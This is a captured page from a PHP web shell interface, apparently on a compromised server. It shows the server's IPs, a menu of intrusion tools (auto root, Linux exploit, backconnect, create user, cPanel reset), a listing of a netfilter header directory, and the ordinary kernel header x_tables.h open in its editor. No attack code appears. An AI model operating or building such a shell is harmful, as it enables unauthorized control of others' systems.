Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.137.159.17
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
include /
linux /
netfilter /
[ HOME SHELL ]
Name
Size
Permission
Action
ipset
[ DIR ]
drwxr-xr-x
nf_conntrack_common.h
4.09
KB
-rw-r--r--
nf_conntrack_ftp.h
375
B
-rw-r--r--
nf_conntrack_sctp.h
595
B
-rw-r--r--
nf_conntrack_tcp.h
1.24
KB
-rw-r--r--
nf_conntrack_tuple_common.h
708
B
-rw-r--r--
nf_nat.h
1.12
KB
-rw-r--r--
nf_tables.h
31.31
KB
-rw-r--r--
nf_tables_compat.h
668
B
-rw-r--r--
nfnetlink.h
2.01
KB
-rw-r--r--
nfnetlink_acct.h
522
B
-rw-r--r--
nfnetlink_compat.h
2.33
KB
-rw-r--r--
nfnetlink_conntrack.h
5.42
KB
-rw-r--r--
nfnetlink_cthelper.h
1.11
KB
-rw-r--r--
nfnetlink_cttimeout.h
2.8
KB
-rw-r--r--
nfnetlink_log.h
2.51
KB
-rw-r--r--
nfnetlink_queue.h
2.88
KB
-rw-r--r--
x_tables.h
4.3
KB
-rw-r--r--
xt_AUDIT.h
655
B
-rw-r--r--
xt_CHECKSUM.h
500
B
-rw-r--r--
xt_CLASSIFY.h
154
B
-rw-r--r--
xt_CONNMARK.h
136
B
-rw-r--r--
xt_CONNSECMARK.h
238
B
-rw-r--r--
xt_CT.h
790
B
-rw-r--r--
xt_DSCP.h
634
B
-rw-r--r--
xt_HMARK.h
841
B
-rw-r--r--
xt_IDLETIMER.h
1.3
KB
-rw-r--r--
xt_LED.h
407
B
-rw-r--r--
xt_LOG.h
579
B
-rw-r--r--
xt_MARK.h
121
B
-rw-r--r--
xt_NFLOG.h
326
B
-rw-r--r--
xt_NFQUEUE.h
716
B
-rw-r--r--
xt_RATEEST.h
305
B
-rw-r--r--
xt_SECMARK.h
486
B
-rw-r--r--
xt_TCPMSS.h
172
B
-rw-r--r--
xt_TCPOPTSTRIP.h
344
B
-rw-r--r--
xt_TEE.h
240
B
-rw-r--r--
xt_TPROXY.h
483
B
-rw-r--r--
xt_addrtype.h
1021
B
-rw-r--r--
xt_bpf.h
340
B
-rw-r--r--
xt_cgroup.h
149
B
-rw-r--r--
xt_cluster.h
311
B
-rw-r--r--
xt_comment.h
167
B
-rw-r--r--
xt_connbytes.h
514
B
-rw-r--r--
xt_connlabel.h
217
B
-rw-r--r--
xt_connlimit.h
512
B
-rw-r--r--
xt_connmark.h
691
B
-rw-r--r--
xt_conntrack.h
2.43
KB
-rw-r--r--
xt_cpu.h
136
B
-rw-r--r--
xt_dccp.h
420
B
-rw-r--r--
xt_devgroup.h
366
B
-rw-r--r--
xt_dscp.h
638
B
-rw-r--r--
xt_ecn.h
673
B
-rw-r--r--
xt_esp.h
355
B
-rw-r--r--
xt_hashlimit.h
1.83
KB
-rw-r--r--
xt_helper.h
125
B
-rw-r--r--
xt_iprange.h
518
B
-rw-r--r--
xt_ipvs.h
588
B
-rw-r--r--
xt_length.h
158
B
-rw-r--r--
xt_limit.h
610
B
-rw-r--r--
xt_mac.h
135
B
-rw-r--r--
xt_mark.h
197
B
-rw-r--r--
xt_multiport.h
658
B
-rw-r--r--
xt_nfacct.h
238
B
-rw-r--r--
xt_osf.h
3.27
KB
-rw-r--r--
xt_owner.h
306
B
-rw-r--r--
xt_physdev.h
469
B
-rw-r--r--
xt_pkttype.h
125
B
-rw-r--r--
xt_policy.h
914
B
-rw-r--r--
xt_quota.h
337
B
-rw-r--r--
xt_rateest.h
774
B
-rw-r--r--
xt_realm.h
157
B
-rw-r--r--
xt_recent.h
966
B
-rw-r--r--
xt_rpfilter.h
257
B
-rw-r--r--
xt_sctp.h
2.22
KB
-rw-r--r--
xt_set.h
1.72
KB
-rw-r--r--
xt_socket.h
382
B
-rw-r--r--
xt_state.h
268
B
-rw-r--r--
xt_statistic.h
653
B
-rw-r--r--
xt_string.h
601
B
-rw-r--r--
xt_tcpmss.h
190
B
-rw-r--r--
xt_tcpudp.h
1.16
KB
-rw-r--r--
xt_time.h
667
B
-rw-r--r--
xt_u32.h
689
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : x_tables.h
#ifndef _X_TABLES_H #define _X_TABLES_H #include <linux/kernel.h> #include <linux/types.h> #define XT_FUNCTION_MAXNAMELEN 30 #define XT_EXTENSION_MAXNAMELEN 29 #define XT_TABLE_MAXNAMELEN 32 struct xt_entry_match { union { struct { __u16 match_size; /* Used by userspace */ char name[XT_EXTENSION_MAXNAMELEN]; __u8 revision; } user; struct { __u16 match_size; /* Used inside the kernel */ struct xt_match *match; } kernel; /* Total length */ __u16 match_size; } u; unsigned char data[0]; }; struct xt_entry_target { union { struct { __u16 target_size; /* Used by userspace */ char name[XT_EXTENSION_MAXNAMELEN]; __u8 revision; } user; struct { __u16 target_size; /* Used inside the kernel */ struct xt_target *target; } kernel; /* Total length */ __u16 target_size; } u; unsigned char data[0]; }; #define XT_TARGET_INIT(__name, __size) \ { \ .target.u.user = { \ .target_size = XT_ALIGN(__size), \ .name = __name, \ }, \ } struct xt_standard_target { struct xt_entry_target target; int verdict; }; struct xt_error_target { struct xt_entry_target target; char errorname[XT_FUNCTION_MAXNAMELEN]; }; /* The argument to IPT_SO_GET_REVISION_*. Returns highest revision * kernel supports, if >= revision. */ struct xt_get_revision { char name[XT_EXTENSION_MAXNAMELEN]; __u8 revision; }; /* CONTINUE verdict for targets */ #define XT_CONTINUE 0xFFFFFFFF /* For standard target */ #define XT_RETURN (-NF_REPEAT - 1) /* this is a dummy structure to find out the alignment requirement for a struct * containing all the fundamental data types that are used in ipt_entry, * ip6t_entry and arpt_entry. This sucks, and it is a hack. It will be my * personal pleasure to remove it -HW */ struct _xt_align { __u8 u8; __u16 u16; __u32 u32; __u64 u64; }; #define XT_ALIGN(s) __ALIGN_KERNEL((s), __alignof__(struct _xt_align)) /* Standard return verdict, or do jump. */ #define XT_STANDARD_TARGET "" /* Error verdict. */ #define XT_ERROR_TARGET "ERROR" #define SET_COUNTER(c,b,p) do { (c).bcnt = (b); (c).pcnt = (p); } while(0) #define ADD_COUNTER(c,b,p) do { (c).bcnt += (b); (c).pcnt += (p); } while(0) struct xt_counters { __u64 pcnt, bcnt; /* Packet and byte counters */ }; /* The argument to IPT_SO_ADD_COUNTERS. */ struct xt_counters_info { /* Which table. */ char name[XT_TABLE_MAXNAMELEN]; unsigned int num_counters; /* The counters (actually `number' of these). */ struct xt_counters counters[0]; }; #define XT_INV_PROTO 0x40 /* Invert the sense of PROTO. */ /* fn returns 0 to continue iteration */ #define XT_MATCH_ITERATE(type, e, fn, args...) \ ({ \ unsigned int __i; \ int __ret = 0; \ struct xt_entry_match *__m; \ \ for (__i = sizeof(type); \ __i < (e)->target_offset; \ __i += __m->u.match_size) { \ __m = (void *)e + __i; \ \ __ret = fn(__m , ## args); \ if (__ret != 0) \ break; \ } \ __ret; \ }) /* fn returns 0 to continue iteration */ #define XT_ENTRY_ITERATE_CONTINUE(type, entries, size, n, fn, args...) \ ({ \ unsigned int __i, __n; \ int __ret = 0; \ type *__entry; \ \ for (__i = 0, __n = 0; __i < (size); \ __i += __entry->next_offset, __n++) { \ __entry = (void *)(entries) + __i; \ if (__n < n) \ continue; \ \ __ret = fn(__entry , ## args); \ if (__ret != 0) \ break; \ } \ __ret; \ }) /* fn returns 0 to continue iteration */ #define XT_ENTRY_ITERATE(type, entries, size, fn, args...) \ XT_ENTRY_ITERATE_CONTINUE(type, entries, size, 0, fn, args) /* pos is normally a struct ipt_entry/ip6t_entry/etc. */ #define xt_entry_foreach(pos, ehead, esize) \ for ((pos) = (typeof(pos))(ehead); \ (pos) < (typeof(pos))((char *)(ehead) + (esize)); \ (pos) = (typeof(pos))((char *)(pos) + (pos)->next_offset)) /* can only be xt_entry_match, so no use of typeof here */ #define xt_ematch_foreach(pos, entry) \ for ((pos) = (struct xt_entry_match *)entry->elems; \ (pos) < (struct xt_entry_match *)((char *)(entry) + \ (entry)->target_offset); \ (pos) = (struct xt_entry_match *)((char *)(pos) + \ (pos)->u.match_size)) #endif /* _X_TABLES_H */
Close